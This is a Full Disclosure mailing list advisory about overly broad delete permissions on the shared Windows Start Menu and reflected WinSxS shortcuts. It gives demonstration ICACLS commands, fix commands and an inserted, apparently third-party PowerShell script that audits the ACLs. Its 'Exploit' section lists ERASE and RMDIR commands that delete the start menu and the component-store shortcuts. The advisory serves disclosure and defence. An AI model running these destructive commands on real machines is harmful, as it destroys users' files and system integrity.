From: Stefan Kanthak via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 8 Jan 2026 12:40:10 +0100
Hi @ll,
the following is a condensed form of
<https://skanthak.hier-im-netz.de/whispers.html#whisper3> and
<https://skanthak.hier-im-netz.de/whispers.html#whisper4>.
Windows Vista moved the shared start menu from "%ALLUSERSPROFILE%\Start Menu\"
to "%ProgramData%\Microsoft\Windows\Start Menu\", with some shortcuts (*.lnk)
"reflected" from the (immutable) component store below %SystemRoot%\WinSxS\.
JFTR: "reflection" is M$FT lingo for a hardlink into the component store.
Before this move only Administrators had write access to the shared start menu;
afterwards at least the user account(s) created during Windows setup (OOBE,
out of box experience) are granted DELETE and DELETE_CHILD access permission.
Demonstration
~~~~~~~~~~~~~
Log on to an arbitrary (unprivileged) user account, start the command processor
and run the following command line to display the access permissions of the
shared start menu:
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu"
| C:\ProgramData\Microsoft\Windows\Start Menu COMPUTER\User:(OI)(CI)(IO)(DE,DC)
| S-1-5-21-xxx-yyy-zzz-1000:(OI)(CI)(IO)(DE,DC)
| COMPUTER\Administrator:(OI)(CI)(IO)(DE,DC)
| NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
| BUILTIN\Administrators:(I)(OI)(CI)(F)
| BUILTIN\Users:(I)(OI)(CI)(RX)
| Everyone:(I)(OI)(CI)(RX)
Instead of "COMPUTER" you get your computer name (see the environment variables
%COMPUTERNAME% and %USERDOMAIN%); instead of "User" and "Administrator" you get
the first/primary and the localized administrator account name.
"(OI)(CI)(IO)(DE,DC)" means "inherit DELETE and DELETE CHILD access permission
to all objects/files and containers/directories below this directory".
Run the following command line to confirm the latter:
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /T | FINDSTR.EXE /L "%ProgramData% (DE,DC)"
"Thanks" to the braindead "reflection" of shortcuts (generally: files) from
the component store their access permissions are changed too:
ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /T | FINDSTR.EXE /L "%SystemRoot% (DE,DC)"
Exploit
~~~~~~~
"Thanks" to the DELETE_CHILD access permission some unprivileged users have
been able to remove the shared start menu COMPLETELY for NINETEEN years!
ERASE /A:HS /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini"
ERASE /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk"
RMDIR /Q /S "%ProgramData%\Microsoft\Windows\Start Menu"
"Thanks" to the braindead "reflection" of shortcuts (generally: files) from
the component store the same unprivileged users can also erase them there
and destroy the integrity of the component store:
ERASE /F /Q /S "%SystemRoot%\WinSxS\*.lnk"
Fix
~~~
Remove the SUPERFLUOUS access permissions (needs SE_RESTORE_PRIVILEGE):
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /Remove:g "%USERDOMAIN%\Administrator" "%USERDOMAIN%\%USERNAME%" "%USERDOMAIN%\User" *S-1-5-21-xxx-yyy-zzz-RID ... /T
ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /Remove:g "%USERDOMAIN%\Administrator" "%USERDOMAIN%\%USERNAME%" "%USERDOMAIN%\User" *S-1-5-21-xxx-yyy-zzz-RID ... /T
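As an added check that is not part of Stefan Kanthak's post, the following PowerShell script (my own, assumes PowerShell 3 or later) audits the shared start menu tree and the reflected *.lnk files in WinSxS and lists every Allow ACE that grants DELETE or DELETE_CHILD to a principal other than SYSTEM and Administrators, i.e. exactly the entries the ICACLS /Remove:g commands above take away. Reading a security descriptor only needs READ_CONTROL, which Users/Everyone hold via (RX), so it can be run from an unprivileged account before and after applying the fix.

```powershell
# Added audit script (not from the original post): report superfluous DELETE/DELETE_CHILD ACEs
# on "%ProgramData%\Microsoft\Windows\Start Menu" and on reflected "%SystemRoot%\WinSxS\*.lnk".
$startMenu = Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu'
$winSxS    = Join-Path $env:SystemRoot  'WinSxS'

# Well-known SIDs that legitimately hold full control on these objects.
$trustedSids  = @('S-1-5-18', 'S-1-5-32-544')   # NT AUTHORITY\SYSTEM, BUILTIN\Administrators
# DELETE (0x10000) and FILE_DELETE_CHILD (0x40), shown by ICACLS as (DE,DC).
$deleteRights = [int]([System.Security.AccessControl.FileSystemRights]::Delete -bor
                      [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles)

function Get-SuperfluousDeleteAce {
    param([string[]]$Path)
    foreach ($p in ($Path | Where-Object { $_ })) {
        $acl = Get-Acl -LiteralPath $p -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (([int]$ace.FileSystemRights -band $deleteRights) -eq 0) { continue }
            # Resolve the identity to its SID; an orphaned SID (deleted account) is already a SID.
            try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { $sid = $ace.IdentityReference.Value }
            if ($trustedSids -contains $sid) { continue }
            [pscustomobject]@{
                Path      = $p
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# The start menu root, everything below it, and every reflected shortcut in the component store.
$targets  = @($startMenu)
$targets += Get-ChildItem -LiteralPath $startMenu -Recurse -Force -ErrorAction SilentlyContinue |
            ForEach-Object FullName
$targets += Get-ChildItem -LiteralPath $winSxS -Recurse -Filter '*.lnk' -Force -ErrorAction SilentlyContinue |
            ForEach-Object FullName

$findings = @(Get-SuperfluousDeleteAce -Path $targets)
if ($findings.Count) { $findings | Format-Table -AutoSize }
else                 { 'No superfluous DELETE/DELETE_CHILD ACEs found.' }
```

On an unfixed installation the output lists the OOBE user account(s) and the localized Administrator account with Delete and DeleteSubdirectoriesAndFiles rights on the root (not inherited) and on every object below it (inherited); after the ICACLS /Remove:g commands the list should be empty.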
stay tuned, and far away from unprotected system( file)s
Stefan Kanthak
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Defense in depth -- the Microsoft way (part 95): the (shared) "Start Menu" is dispensable Stefan Kanthak via Fulldisclosure (Jan 10)